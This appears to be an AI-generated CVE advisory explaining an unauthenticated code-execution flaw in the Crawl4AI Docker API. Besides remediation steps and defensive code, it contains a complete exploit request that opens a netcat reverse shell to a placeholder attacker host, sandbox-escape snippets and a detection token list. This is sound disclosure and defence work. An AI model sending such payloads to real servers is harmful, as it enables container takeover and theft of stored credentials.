CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.




CVE-2026-26216
CVSS 10.0 · EPSS 0.20%

Crawl4AI RCE: Hook, Line, and Sinker

Amit Schendel
Senior Security Researcher

Feb 16, 2026 · 6 min read

PoC Available

Executive Summary (TL;DR)

Unauthenticated Remote Code Execution in Crawl4AI Docker deployments. The application allows users to define custom Python 'hooks' for web scraping. The sandbox implementation failed to block the `__import__` builtin, allowing attackers to escape the sandbox and execute system commands as the container user. Patch immediately to v0.8.0.

A critical RCE in Crawl4AI's Docker API allows unauthenticated attackers to execute arbitrary Python code via the 'hooks' parameter. The hook code is run with 'exec()' inside a sandbox that left '__import__' exposed, so attackers can import any module, bypass the restrictions, and compromise the container.

The Hook: When Flexibility Meets Fatal Flaws

In the gold rush of the AI era, data is the shovel. Crawl4AI positioned itself as the high-speed conveyor belt for that shovel, a tool designed specifically to scrape the web and feed clean data into Large Language Models (LLMs). To make this tool versatile, the developers added a feature that sounded great on paper but was catastrophic in practice: Hooks.

Hooks allow users to modify the scraping behavior on the fly. Need to strip some HTML before processing? Add a hook. Need to execute custom logic when a page loads? Add a hook. In the Docker API deployment, these hooks are passed as strings within a JSON payload.

Here is the problem: to make a hook work, the application has to execute code provided by the user. If you are a security researcher, your ears just perked up. Allowing users to send code to be executed on your server is the digital equivalent of handing a burglar your house keys and asking them to water your plants while you're on vacation. You're trusting them to only water the plants.

The Flaw: The Sandbox That Wasn't

The developers of Crawl4AI weren't completely oblivious to the danger. They knew that running raw user code was risky, so they attempted to implement a 'sandbox'. In Python, this usually involves using exec() or eval() with a restricted scope—specifically, by limiting the globals and locals dictionaries passed to the function.

The idea is simple: if you don't give the code access to the os module or the subprocess module, it can't hurt you, right? Wrong. This is the 'blacklist' approach to security: it holds only if every dangerous capability has been removed, and in a dynamic language like Python there is almost always one more way in.

The specific failure here was leaving the __import__ builtin accessible. Python's object model is introspective and powerful. Even if you remove os from the namespace, if __import__ is present, the attacker can simply say "I'd like the os module, please," and Python obliges. The sandbox was effectively a door with a heavy deadbolt but no hinges.
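To make that concrete, here is a minimal sketch of the behavior, not Crawl4AI's actual code. The names `restricted` and `hook_code` are made up for illustration, and the "payload" only reads the working directory. The point is that Python's exec() inserts the full builtins into any globals dictionary that lacks a `__builtins__` key, so `__import__` comes along for free.

```python
import math
import os

# A "restricted" namespace in the spirit of the flawed sandbox:
# a couple of harmless names, and no os or subprocess in sight.
restricted = {"math": math, "str": str}

# Stand-in for attacker-supplied hook code. It only reads the working
# directory, but any other os function is reachable the same way.
hook_code = "leaked = __import__('os').getcwd()"

exec(hook_code, restricted)

# exec() added the builtins under '__builtins__' because the key was missing.
print("__builtins__" in restricted)          # True
print(restricted["leaked"] == os.getcwd())   # True
```

Nothing in the dictionary mentioned os, yet the hook reached it anyway.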

The Code: Anatomy of a Failure

Let's look at what this vulnerability likely looks like under the hood. The project's exact source isn't reproduced here, but the mechanism described is a classic Python anti-pattern. The vulnerable code takes the hooks parameter from the API request and passes it to an execution handler.

The Vulnerable Logic:

# Simplified representation of the flaw (illustrative, not the project's source)
import math

def execute_hook(hook_code, context):
    # The developer tries to be safe by defining a "safe" scope
    safe_globals = {
        'math': math,
        'str': str,
        # ... other innocuous names ...
        # FATAL ERROR: there is no '__builtins__' key here, so exec()
        # inserts the full builtins itself, __import__ included
    }

    # The sink: attacker-controlled code runs with every builtin available
    exec(hook_code, safe_globals)

Because the __builtins__ were not rigorously scrubbed (or were implicitly included), the __import__ function remained available. This meant that while the developer thought they were restricting the environment to string manipulation and basic math, they were actually providing a full shell.

The Fix (v0.8.0):

In version 0.8.0, the remediation likely involved either removing the dynamic hook execution feature entirely from the public API or implementing a significantly more robust sandboxing mechanism (though in Python, exec is rarely truly safe). The immediate recommendation is simply to upgrade, which typically sanitizes or removes this capability.
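Why is exec so hard to make safe? The sketch below is an illustration only and makes no claim about what the v0.8.0 patch does. It uses a hypothetical helper, `run_hook`, that passes an empty `__builtins__` mapping. That closes the `__import__` route, but plain attribute access still lets the code climb from a tuple literal to `object` and list every class loaded in the interpreter, which is the usual starting point for the next sandbox escape.

```python
def run_hook(hook_code):
    """Run code with an empty builtins mapping (hypothetical helper)."""
    scope = {"__builtins__": {}}
    exec(hook_code, scope)
    return scope

# With no builtins, the __import__ route from the exploit is closed.
try:
    run_hook("__import__('os')")
    import_blocked = False
except NameError:
    import_blocked = True

# Attribute access needs no builtins, so the code can still walk from a
# tuple literal up to `object` and enumerate every loaded class.
scope = run_hook("classes = ().__class__.__base__.__subclasses__()")
reachable_classes = len(scope["classes"])

print(import_blocked)          # True
print(reachable_classes > 0)   # True
```

Stripping builtins raises the bar but does not make a sandbox, which is why removing the feature or isolating it at the process or container level is the sturdier option.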

The Exploit: Escaping the Sandbox

Exploiting this is trivially easy for anyone who knows Python. We don't need buffer overflows or heap spraying; we just need to ask the server nicely. The attack vector is the /crawl endpoint, specifically the hooks parameter.

Here is the kill chain:

  1. Target: A Crawl4AI instance on port 8080.
  2. Payload: A JSON object defining a hook for on_execution_started.
  3. Mechanism: Use __import__('os') to load the operating system interface, then .system() or .popen() to run shell commands.

The Payload:

POST /crawl HTTP/1.1
Host: target-ip:8080
Content-Type: application/json
 
{
  "urls": ["http://google.com"],
  "hooks": {
    "on_execution_started": "__import__('os').system('nc -e /bin/sh attacker.com 4444')"
  }
}

In this scenario, as soon as the crawl job initializes, the server executes the hook. The Python interpreter resolves __import__, loads os, executes the Netcat reverse shell, and suddenly you have a terminal inside their Docker container. From there, you can dump environment variables (which often contain API keys for OpenAI, Anthropic, or AWS), modify the filesystem, or pivot to other containers on the same network.
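For defenders triaging logs, a rough first pass is to look for hook strings that contain tokens no scraping hook should need. The sketch below assumes request bodies shaped like the payload above (a top-level "hooks" object mapping hook names to code strings). The function name and the token list are illustrative assumptions. Treat it as a hunting aid, not a control, because an obfuscated payload will get past a substring match.

```python
import json

# Substrings that have no business appearing in a scraping hook.
# Assumed, incomplete list; obfuscated payloads will slip past it.
SUSPICIOUS_TOKENS = (
    "__import__", "__builtins__", "__subclasses__",
    "os.system", "subprocess", "popen",
)

def flag_suspicious_hooks(request_body):
    """Return {hook_name: [matched tokens]} for a logged /crawl JSON body."""
    try:
        payload = json.loads(request_body)
    except json.JSONDecodeError:
        return {}
    hooks = payload.get("hooks") if isinstance(payload, dict) else None
    if not isinstance(hooks, dict):
        return {}
    findings = {}
    for name, code in hooks.items():
        text = str(code).lower()
        hits = [token for token in SUSPICIOUS_TOKENS if token in text]
        if hits:
            findings[name] = hits
    return findings

logged_body = json.dumps({
    "urls": ["http://google.com"],
    "hooks": {
        "on_execution_started":
            "__import__('os').system('nc -e /bin/sh attacker.com 4444')"
    },
})
print(flag_suspicious_hooks(logged_body))
# {'on_execution_started': ['__import__']}
```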

The Impact: Why This Matters

You might be thinking, "It's just a Docker container, who cares?" You should care. In modern DevOps environments, containers are rarely isolated islands. They are often run with:

  1. Environment Variables: Containing sensitive API keys (OpenAI, AWS, DB credentials) needed for the application to function.
  2. Mounted Volumes: Access to host filesystems or shared data directories.
  3. Internal Network Access: The ability to talk to internal databases, Redis caches, or other microservices that aren't exposed to the public internet.
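To get a feel for the first item, it helps to inventory what a compromised container would hand over. The sketch below lists environment variable names that look like secrets, which is also a reasonable starting list for what to rotate after a suspected compromise. The name pattern and the helper `secret_like_env_names` are assumptions for illustration; real deployments may use names this pattern misses.

```python
import os
import re

# Name fragments that usually indicate a credential (assumed heuristic).
SECRET_NAME = re.compile(
    r"(KEY|TOKEN|SECRET|PASSWORD|PASSWD|CREDENTIAL)", re.IGNORECASE
)

def secret_like_env_names(environ=None):
    """Return sorted variable names that look like secrets; values are never read."""
    env = os.environ if environ is None else environ
    return sorted(name for name in env if SECRET_NAME.search(name))

sample = {"OPENAI_API_KEY": "x", "PATH": "/usr/bin", "db_password": "y"}
print(secret_like_env_names(sample))
# ['OPENAI_API_KEY', 'db_password']
```

Running it inside the container with no arguments reports on the live environment, which is the same view an attacker's shell would have.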

With a CVSS score of 10.0, this is a "drop everything and patch" situation. An unauthenticated RCE means that automated botnets will likely start scanning for this vulnerability to install crypto-miners or add the server to a DDoS fleet. If you are running Crawl4AI to power your LLM pipeline, an attacker could also poison your data or steal your proprietary datasets.

The Fix: Closing the Window

The mitigation is straightforward: stop using the vulnerable version. The developers released version 0.8.0 which resolves this issue. If you are running unclecode/crawl4ai in Docker, you need to pull the latest image immediately.

Remediation Steps:

  1. Update: docker pull unclecode/crawl4ai:latest
  2. Restart: Bounce your containers to ensure the new code is running.
  3. Verify: Check the version logs on startup.
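Once you have the version string from the startup logs, the comparison against the fixed release can be scripted. This is a minimal sketch: `parse_version` and `is_patched` are hypothetical helpers, the only fact taken from the advisory is that versions below 0.8.0 are affected, and the parser handles plain dotted numbers only (a pre-release suffix such as "rc1" raises ValueError rather than being guessed at).

```python
FIXED_VERSION = (0, 8, 0)

def parse_version(text):
    """Turn '0.7.8' or 'v0.8.0' into a tuple of ints; plain dotted numbers only."""
    parts = tuple(int(part) for part in text.strip().lstrip("vV").split("."))
    # Pad short versions so that '0.8' compares equal to '0.8.0'.
    return parts + (0,) * (3 - len(parts))

def is_patched(version_text):
    """True when the version is at or above the fixed release."""
    return parse_version(version_text) >= FIXED_VERSION

print(is_patched("0.7.8"))    # False
print(is_patched("v0.8.0"))   # True
```

Comparing tuples of integers avoids the string-comparison trap where "0.10.0" sorts before "0.8.0".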

Defense in Depth:

Beyond patching, this vulnerability highlights why you shouldn't expose internal tools to the public internet without authentication. Even if the app claims to have auth, put it behind a reverse proxy (like Nginx or Traefik) and enforce your own Basic Auth or mTLS. Never assume an internal tool is hardened against public internet threats.
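The check such a front layer performs is small. The sketch below shows it as WSGI middleware purely to illustrate the logic. `require_basic_auth` is a hypothetical wrapper, not part of Crawl4AI, and in practice Nginx or Traefik would do this job in front of the container. Credentials are compared with hmac.compare_digest so the comparison does not leak information through timing.

```python
import base64
import hmac

def require_basic_auth(app, username, password):
    """Wrap a WSGI app so every request must carry matching Basic credentials."""
    expected = base64.b64encode(f"{username}:{password}".encode("utf-8"))

    def guarded(environ, start_response):
        header = environ.get("HTTP_AUTHORIZATION", "")
        scheme, _, supplied = header.partition(" ")
        supplied_bytes = supplied.strip().encode("latin-1", "replace")
        # Constant-time comparison of the base64-encoded credentials.
        authorized = scheme.lower() == "basic" and hmac.compare_digest(
            supplied_bytes, expected
        )
        if not authorized:
            start_response("401 Unauthorized", [
                ("WWW-Authenticate", 'Basic realm="restricted"'),
                ("Content-Type", "text/plain"),
            ])
            return [b"authentication required\n"]
        return app(environ, start_response)

    return guarded
```

Wrapping an application as `require_basic_auth(app, "ops", "a-long-random-password")` rejects every request without the right header before the inner application sees it.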

Official Patches

Crawl4AI: Release v0.8.0 addressing the vulnerability

Technical Appendix

CVSS Score: 10.0 / 10
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
EPSS Probability: 0.20%
Top 58% most exploited
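The 10.0 can be reproduced from the vector string. The sketch below follows the base score equations and metric weights of the CVSS v3.1 specification. The function names are illustrative, and only base metrics are handled (no temporal or environmental scoring).

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required is weighted differently when scope changes.
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}

def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0

def base_score(vector):
    """Compute the CVSS v3.1 base score from a vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope_changed = metrics["S"] == "C"
    cia = WEIGHTS["CIA"]
    iss = 1 - (1 - cia[metrics["C"]]) * (1 - cia[metrics["I"]]) * (1 - cia[metrics["A"]])
    if scope_changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22
        * WEIGHTS["AV"][metrics["AV"]]
        * WEIGHTS["AC"][metrics["AC"]]
        * PR_WEIGHTS[metrics["S"]][metrics["PR"]]
        * WEIGHTS["UI"][metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    if scope_changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))

print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"))  # 10.0
```

The S:C (scope changed) metric is what lifts the score from 9.8 to the 10.0 cap: the same vector with S:U scores 9.8.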

Affected Systems

Crawl4AI Docker API (versions < 0.8.0)

Affected Versions Detail

Product                 Affected Versions   Fixed Version
Crawl4AI (unclecode)    < 0.8.0             0.8.0

Attribute        Detail
CWE ID           CWE-94 (Improper Control of Generation of Code)
CVSS v3.1        10.0 (Critical)
Attack Vector    Network (Unauthenticated)
Impact           Remote Code Execution (RCE)
EPSS Score       0.20% (Rising)
Exploit Status   Proof of Concept Available

MITRE ATT&CK Mapping

  • T1190: Exploit Public-Facing Application (Initial Access)
  • T1059.006: Command and Scripting Interpreter: Python (Execution)
  • T1611: Escape to Host (Privilege Escalation)

CWE-94: Improper Control of Generation of Code ('Code Injection')

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Known Exploits & Detection

  • Nuclei Templates: Nuclei template for detecting unauthenticated RCE in Crawl4AI
  • Nuclei: Detection Template Available

Vulnerability Timeline

  • 2026-01-16: Vulnerability Disclosed via GHSA
  • 2026-02-12: CVE-2026-26216 Assigned
  • 2026-02-12: Patch (v0.8.0) Released
  • 2026-02-17: Public PoC Released
